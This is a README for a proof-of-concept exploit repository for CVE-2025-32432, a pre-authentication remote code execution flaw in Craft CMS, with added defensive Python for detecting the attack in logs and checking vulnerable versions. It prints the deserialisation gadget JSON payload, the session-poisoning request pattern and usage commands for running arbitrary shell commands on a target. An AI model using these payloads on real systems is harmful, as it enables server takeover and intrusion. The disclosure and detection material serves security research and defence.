
CVE-2025-32432 PoC — Craft CMS Allows Remote Code Execution

Associated Vulnerability

Title: Craft CMS Allows Remote Code Execution (CVE-2025-32432)
Description: Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector. This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.

Readme

# CVE-2025-32432 Exploit Scripts (Python PoC)

> **Pre-auth Remote Code Execution for CraftCMS 3.x / 4.x / 5.x**  
> **PoC Maintainer:** C.T.Y. (research use only)  
> **Vulnerability Discovery:** Nicolas Bourras – Orange Cyberdefense  
> **Additional PoC Inspiration:** SensePost research & Chirag Artani’s public script

---

## 1. Overview

This repository bundles two complementary Python exploits for **CVE-2025-32432** — a pre-authentication RCE in CraftCMS’ asset-transform endpoint.

| Script                      | Purpose                                                                                                                                                                         |
| --------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `craftcms_rce_php_check.py` | _Safety probe_ — sends **one request** using the **`FnStream`** gadget to call `phpinfo()`; if its output comes back in the response, the gadget chain fires on the target. Low-impact compared with a shell, but it still executes PHP on the server and echoes the server's configuration. |
| `craftcms_final_payload.py` | _Full exploit_ — **two-packet chain**: first implants PHP via `FnStream`, then leverages the **`FieldLayoutBehavior → PhpManager`** gadget to execute **any shell command**.    |

> The second script is the one described throughout this README.  
> The first script is included for completeness and quick validation, courtesy of **Chirag Artani** — see _Credits_.  
> _Script filename was adapted for clarity; original structure & idea by Chirag Artani._

---

## 2. Disclaimer 🚨

For **educational & authorised security testing** only.  
Using these scripts against systems **without explicit written permission** is **illegal and unethical**.

---

## 3. Features (final payload)

- One-shot **two-packet** RCE
- Automatic `assetId` discovery: IDs are tried in sequence, and one whose response changes from `404` to `302` is taken as valid
- Custom shell-command execution (`-c/--cmd`)
- Works over HTTP **or** HTTPS (certificate-verification warnings are suppressed, i.e. the server certificate is not validated)
- Clean extraction of command output from the HTML response

---

## 4. Requirements

- Python **3.8+**
- PyPI packages (install via `pip install -r requirements.txt`):
  - `requests`
  - `urllib3`

---

## 5. Installation

```bash
# Clone the repo
git clone https://github.com/yourname/CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt

# Install dependencies
pip install -r requirements.txt
```


---

## 6. Usage

### 6.1 Quick PHP-exec Check

```bash
python3 craftcms_rce_php_check.py -u https://victim.com
```

If you see `phpinfo()` output, the target is very likely exploitable. Keep in mind that this check is not a passive fingerprint: it already executes PHP on the target and dumps its configuration, so treat it as an intrusive test.

### 6.2 Full Two-Packet Exploit

```bash
python3 craftcms_final_payload.py -u https://victim.com -c "id"
```

#### Options

| Option | Long form    | Description                         | Required |
| ------ | ------------ | ----------------------------------- | -------- |
| `-u`   | `--url`      | Target base URL (no trailing slash) | ✅       |
| `-c`   | `--cmd`      | Shell command to run                | ✅       |
| `-a`   | `--asset`    | Known good `assetId`                | ❌       |
| `-s`   | `--scan-max` | Brute limit (default: 300)          | ❌       |

---

## 7. How the Vulnerability Works (recap)

- **Session Poisoning** — a GET to `/index.php?p=admin/dashboard&a=<?=...?>` gets the attacker-supplied value stored in the PHP session, so the PHP source ends up on disk in the session file. With PHP's default file handler that file is `sess_<ID>` under `session.save_path` (typically `/tmp`), and `<ID>` is the session ID the server hands back in the session cookie of that response.
- **Deserialisation Gadget** — a POST to `actions/assets/generate-transform` whose `handle` parameter is an object configuration carrying the `FieldLayoutBehavior → PhpManager` gadget. `yii\rbac\PhpManager` loads its `itemFile` with `require`, so pointing it at the poisoned session file executes the planted PHP.

```json
{
  "assetId": 11,
  "handle": {
    "width": 1,
    "height": 1,
    "as hack": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "yii\\rbac\\PhpManager",
      "__construct()": [
        {
          "itemFile": "/tmp/sess_<SessionID>"
        }
      ]
    }
  }
}
```
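The two request shapes above are what a defender needs to recognise in proxy or WAF logs: a query value carrying a PHP open tag, and a transform request whose `handle` contains the keys Yii's object factory acts on (`class`, `__class`, `__construct()`, `as ...`, `on ...`). The following detector is an added example written for this page, not code from the PoC repository; the log-record field names and the sample records are constructed, and the route can appear either as a path or as the `?p=` parameter.

```python
import json
from typing import Any, Dict, Iterator, List
from urllib.parse import parse_qsl, unquote

# Keys that Yii's object factory (Yii::createObject / BaseYii::configure)
# treats as instructions rather than plain data: a class override,
# constructor arguments, and behavior ("as ...") or event ("on ...")
# attachment. A transform config sent by a browser never needs them.
YII_MAGIC_KEYS = ("class", "__class", "__construct()")
YII_MAGIC_PREFIXES = ("as ", "on ")

TRANSFORM_ACTION = "actions/assets/generate-transform"

# Constructed sample records in the shape a WAF or reverse proxy might log
# (hypothetical field names; adapt to your own log source).
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    # stage 1: session-poisoning GET, PHP open tag percent-encoded in a query value
    {"method": "GET", "path": "/index.php",
     "query": "p=admin/dashboard&a=%3C%3F%3Dsystem%28%24_GET%5B%27c%27%5D%29%3B%3F%3E",
     "body": ""},
    # stage 2: the gadget config from the README, posted via the ?p= route
    {"method": "POST", "path": "/index.php",
     "query": "p=actions/assets/generate-transform",
     "body": json.dumps({
         "assetId": 11,
         "handle": {
             "width": 1, "height": 1,
             "as hack": {
                 "class": "craft\\behaviors\\FieldLayoutBehavior",
                 "__class": "yii\\rbac\\PhpManager",
                 "__construct()": [{"itemFile": "/tmp/sess_<SessionID>"}],
             },
         },
     })},
    # benign ad-hoc transform: structured handle, but no factory keys
    {"method": "POST", "path": "/actions/assets/generate-transform", "query": "",
     "body": json.dumps({"assetId": 11, "handle": {"width": 100, "height": 100}})},
    # benign dashboard GET
    {"method": "GET", "path": "/index.php", "query": "p=admin/dashboard", "body": ""},
]


def walk_magic_keys(value: Any, path: str = "$") -> Iterator[str]:
    """Yield the JSON path of every key the Yii object factory would act on."""
    if isinstance(value, dict):
        for key, child in value.items():
            here = f"{path}.{key}"
            if key in YII_MAGIC_KEYS or key.startswith(YII_MAGIC_PREFIXES):
                yield here
            yield from walk_magic_keys(child, here)
    elif isinstance(value, list):
        for i, child in enumerate(value):
            yield from walk_magic_keys(child, f"{path}[{i}]")


def php_tag_in_query(query: str) -> bool:
    """True if any query value contains a PHP open tag after decoding.

    parse_qsl decodes one layer of percent-encoding; the extra unquote()
    also catches a double-encoded payload.
    """
    return any("<?" in unquote(val) for _, val in parse_qsl(query, keep_blank_values=True))


def targets_transform_action(req: Dict[str, str]) -> bool:
    """The action is reachable as a path segment or through the ?p= route parameter."""
    if TRANSFORM_ACTION in req.get("path", ""):
        return True
    return any(k == "p" and v.strip("/") == TRANSFORM_ACTION
               for k, v in parse_qsl(req.get("query", ""), keep_blank_values=True))


def analyse(req: Dict[str, str]) -> List[str]:
    """Return a list of finding tags for one request record (empty if clean)."""
    findings: List[str] = []
    if req.get("method") == "GET" and php_tag_in_query(req.get("query", "")):
        findings.append("php-open-tag-in-query")
    if req.get("method") == "POST" and targets_transform_action(req):
        try:
            body = json.loads(req.get("body") or "null")
        except json.JSONDecodeError:
            body = None  # non-JSON bodies are not inspected by this example
        findings.extend(f"yii-factory-key:{p}" for p in walk_magic_keys(body))
    return findings


def scan(records: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map record index -> findings for every record that produced at least one."""
    return {i: f for i, r in enumerate(records) if (f := analyse(r))}


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_REQUESTS).items():
        print(idx, SAMPLE_REQUESTS[idx]["method"], tags)
```

The two stages are reported separately on purpose: the poisoning GET alone is a strong signal even when the second request never arrives, and a transform POST with factory keys is worth an alert whatever the session file path in `itemFile` turns out to be.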

---

## 8. Tested Versions

- CraftCMS < 3.9.15 (requires `assetId` brute-force)
- CraftCMS < 4.14.15
- CraftCMS < 5.6.17
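The fixed versions listed here and in the advisory description at the top of the page define three separate vulnerable ranges, one per major branch, each starting at that branch's first release candidate. The following triage helper is an added example for this page, not code from the PoC repository; it assumes you already have each site's version string from wherever you inventory it (for instance the `craftcms/cms` entry in `composer.lock`) and only decides whether that string falls inside an advisory range.

```python
import re
from typing import Optional, Tuple

# Fixed release per branch, as stated in the advisory. A branch is
# vulnerable from its first release candidate up to, but not including,
# the fixed version.
FIXED_VERSIONS = {3: (3, 9, 15), 4: (4, 14, 15), 5: (5, 6, 17)}

# Matches "3.9.14", "3.0.0-RC1", "5.6.17-beta.2". The tag word is ignored and
# only its trailing number is compared; that is enough for the RC boundaries
# the advisory uses (assumption of this example, not a full semver parser).
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z]+)\.?(\d*))?$")


def parse_version(text: str) -> Tuple[Tuple[int, int, int], Tuple[int, int]]:
    """Split a Craft version into (core, pre) so tuples compare in release order."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Craft version string: {text!r}")
    core = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
    # A pre-release sorts before the final release of the same core version:
    # final -> (1, 0), pre-release -> (0, n).
    pre = (0, int(m.group(5) or 0)) if m.group(4) else (1, 0)
    return core, pre


def is_vulnerable(version: str) -> Tuple[bool, Optional[str]]:
    """Return (vulnerable, fixed version for that branch).

    A fixed version of None means the major is outside the ranges the
    advisory lists (e.g. 2.x); that is "not covered", not "safe".
    """
    core, pre = parse_version(version)
    fixed = FIXED_VERSIONS.get(core[0])
    if fixed is None:
        return False, None
    fixed_str = ".".join(str(n) for n in fixed)
    # An RC of the fixed version itself still predates the fix.
    return (core, pre) < (fixed, (1, 0)), fixed_str


if __name__ == "__main__":
    # Constructed inventory, not real hosts.
    for v in ["3.9.14", "4.14.15", "5.6.16", "5.6.17-RC1", "5.7.0", "2.9.3"]:
        print(f"{v:12s} -> {is_vulnerable(v)}")
```

Run it against an exported inventory rather than against live sites: the verdict is purely version-based and says nothing about whether the `generate-transform` action is reachable on a particular deployment.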

---

## 9. References & Further Reading

- [Original Advisory — Nicolas Bourras / Orange Cyberdefense](https://orangecyberdefense.com)
- [SensePost Deep-Dive Blog](https://sensepost.com)
- [Chirag Artani’s PoC](https://github.com/Sachinart/CVE-2025-32432)
- [CraftCMS Security Advisory](https://craftcms.com/knowledge-base/security-advisories)
- [CVE-2025-32432 @ MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32432)

---

## 10. Credits

- **C.T.Y.** — Full two-packet PoC & documentation
- **Chirag Artani** — Original `phpinfo` check script (`craftcms_rce_php_check.py`) and early research ideas
  _Script filename was adapted for clarity; original structure & idea by Chirag Artani._
- **Nicolas Bourras / Orange Cyberdefense** — Vulnerability discovery and responsible disclosure
- Additional insights from **SensePost** research team

---

## 11. License

> **Responsibility Notice:**
> Any legal risks or damages arising from the use of this code are solely the responsibility of the user.

MIT License — see `LICENSE`.

---

# Chinese Version (translated to English)

## 1. Project Contents

| File                        | Purpose                                                                                                                                                                            |
| --------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `craftcms_rce_php_check.py` | **PHP execution feasibility check**: a single request that uses `FnStream` to trigger `phpinfo()`, verifying in a low-impact way whether the target is vulnerable.<br/>_The filename was adjusted for clarity; the original idea and script structure are by Chirag Artani._ |
| `craftcms_final_payload.py` | **Full two-packet chain exploit**: first plants PHP via `FnStream`, then executes arbitrary commands via `PhpManager`.                                                             |

---

## 2. Disclaimer

For educational and legally authorised testing only. Unauthorised use is illegal.

---

## 3. Quick Check

```bash
python3 craftcms_rce_php_check.py -u https://target-site
```

---

## 4. Full Exploit

```bash
python3 craftcms_final_payload.py -u https://target-site -c "id"
```

Parameters are the same as in the English version.

---

## 5. Credits

- **Chirag Artani** — `phpinfo` check script
  _The filename was adjusted for clarity; the original idea and script structure are by Chirag Artani._
- **Nicolas Bourras / Orange Cyberdefense** — vulnerability discovery and technical inspiration
- **SensePost** — technical inspiration

---

## 6. License

> Any legal risks or losses arising from the use of this code are borne solely by the user.

MIT License

